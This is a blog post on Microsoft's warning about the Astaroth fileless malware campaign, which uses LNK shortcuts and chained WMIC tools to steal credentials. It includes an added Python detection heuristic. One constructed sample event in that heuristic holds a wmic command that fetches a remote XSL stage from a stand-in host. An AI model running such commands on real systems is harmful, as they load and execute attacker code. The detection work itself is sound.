Microsoft warns about fileless malware codename Astaroth

Categories: Cybercrime, Malware, fileless malware. Written by LewisR, July 11, 2019.


Microsoft has issued a further warning about ongoing malware campaigns that are distributing the Astaroth malware using fileless and living-off-the-land techniques, which make the attacks almost impossible for traditional antivirus solutions to spot.

The malware had slipped under the radar of the free Windows Defender antivirus and was only brought to the attention of the Microsoft team once a huge and sudden spike in usage of the Windows Management Instrumentation Command-line (WMIC) tool was detected. WMIC is a legitimate tool shipped with all modern versions of Windows.

The campaign consisted of a huge spam operation sending out emails containing a link to a website hosting a .LNK shortcut file. If a user was careless enough to download and run this file, it would launch the WMIC tool, which in turn launched a plethora of other legitimate Windows tools, one after the other.

The malware then continues by downloading further code and executing it solely in memory (so-called fileless execution), never saving any file to disk. This makes the job of classic antivirus software impossible, as there is no file on disk for it to scan.
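To make the detection angle concrete, here is an added example that is not from the original post or from Microsoft: a small Python heuristic run over constructed process-creation events, flagging WMIC launches whose command line references a remote URL or which are spawned directly by explorer.exe (what a user double-clicking a downloaded shortcut produces). The event field names and sample records are assumptions made for this example.

```python
import re

# Constructed sample events (not real telemetry): process-creation records
# flattened to dicts. Field names are an assumption of this example.
SAMPLE_EVENTS = [
    {"pid": 1, "ppid": 0, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    # Constructed: a wmic invocation whose command line points at a remote URL,
    # launched from the interactive shell.
    {"pid": 2, "ppid": 1, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmd": 'wmic os get /format:"https://example.invalid/stage.xsl"'},
    {"pid": 3, "ppid": 0, "image": r"C:\Windows\System32\svchost.exe",
     "cmd": "svchost.exe -k netsvcs"},
    # Constructed: benign inventory use of wmic from a service, should not fire.
    {"pid": 4, "ppid": 3, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmd": "wmic computersystem get name"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)


def image_is(event, basename):
    """True if the event's image path ends with the given executable name."""
    return event["image"].lower().endswith("\\" + basename.lower())


def flag_suspicious_wmic(events):
    """Return a list of (pid, reason) for WMIC launches that fit the chain
    described above: WMIC pulling content from a remote URL, or WMIC spawned
    directly by explorer.exe. Benign WMIC use from other parents is ignored."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if not image_is(e, "wmic.exe"):
            continue
        reasons = []
        if URL_RE.search(e["cmd"]):
            reasons.append("wmic command line references a remote URL")
        parent = by_pid.get(e["ppid"])
        if parent is not None and image_is(parent, "explorer.exe"):
            reasons.append("wmic spawned by explorer.exe (interactive shortcut launch)")
        if reasons:
            findings.append((e["pid"], "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    for pid, reason in flag_suspicious_wmic(SAMPLE_EVENTS):
        print(f"pid {pid}: {reason}")
```

The heuristic is behavioural rather than signature-based: it never inspects a file on disk, only the process tree and command line, which is the kind of telemetry that survives a fileless chain.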

[Figure: Astaroth attack chain. Image: Microsoft]

Eventually the Astaroth trojan, a known info-stealer, dumps credentials for the majority of applications and uploads the stolen data to a remote server.

What's next?

The next step in the evolution of modern antivirus products is a shift away from classic file-signature detection.

A new, AI-driven behavioural approach is now required, one that detects "invisible" actions such as fileless (in-memory) execution.

Written by: LewisR

